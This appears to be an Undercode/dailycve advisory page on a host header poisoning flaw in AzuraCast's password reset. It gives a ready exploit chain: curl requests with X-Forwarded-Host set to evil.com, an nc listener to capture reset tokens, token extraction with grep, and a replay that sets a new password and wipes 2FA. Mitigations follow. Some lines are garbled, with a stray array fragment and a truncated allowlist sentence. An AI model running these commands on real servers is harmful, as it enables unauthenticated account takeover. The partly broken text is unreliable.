Listen to this Post
The vulnerability arises from the `ApplyXForwarded` middleware (lines 35-40) which blindly trusts any client-supplied `X-Forwarded-Host` header without validating the source IP. In the default Docker deployment, nginx’s `fastcgi_pass` passes all client headers to PHP-FPM, unlike `proxy_pass` which filters them. Thus an attacker can set `X-Forwarded-Host: evil.com` when calling /forgot. The `Router::buildBaseUrl()` (lines 53-77) uses the poisoned host because `prefer_browser_url` defaults to true, overriding any configured base_url. The `ForgotPasswordAction.php` (lines 72-77) generates an absolute reset URL using this poisoned host, embedding the valid token. The victim receives an email with https://evil.com/login-token/...` and clicks it, leaking the token to the attacker’s server. The attacker then uses that token on the real instance; when resetting the password, `LoginTokenAction.php` (lines 74-75) destroys the user’s 2FA secret (null). This yields full account takeover without any prior authentication, bypassing 2FA entirely.
<h2 style="color: blue;">dailycve form</h2>
Platform: AzuraCast
Version: All versions
Vulnerability: Host header poisoning
Severity: Critical
date: 2026-05-04
<h2 style="color: blue;">Prediction: Not disclosed yet</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Trigger poisoned password reset curl -X POST https://target.azuracast.example/forgot \ -H "X-Forwarded-Host: evil.com" \ -d "[email protected]" Simulate token capture (evil.com log) nc -lvnp 80 Extract token from request path grep -oP '/login-token/\K[a-f0-9]+' access.log Use token on real instance (CSRF extraction) curl -c cookies.txt https://target.azuracast.example/login-token/TOKEN csrf=$(grep -oP 'csrf" value="\K[^"]+' response.html) curl -b cookies.txt -X POST https://target.azuracast.example/login-token/TOKEN \ -d "csrf=$csrf&password=Owned123"
<h2 style="color: blue;">Exploit:</h2>
<h2 style="color: blue;">1. Send POST `/forgot` withX-Forwarded-Host: attacker.com</h2>[‘127.0.0.1′,’nginx’,’web’]`)
2. Victim clicks email link → token sent to attacker.com
3. Attacker replays token to reset password (2FA wiped)
<h2 style="color: blue;">4. Log in as victim with new password</h2>
<h2 style="color: blue;">Protection from this CVE</h2>
- Add trusted proxy allowlist in `ApplyXForwarded.php` (check REMOTE_ADDR against
– Force `base_url` for security emails instead of request host
– Remove `$user->two_factor_secret = null;` from password reset flow
Impact:
- Full account takeover (admin → instance compromise)
- 2FA bypass (secret destroyed on reset)
- Unauthenticated; requires victim email click
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
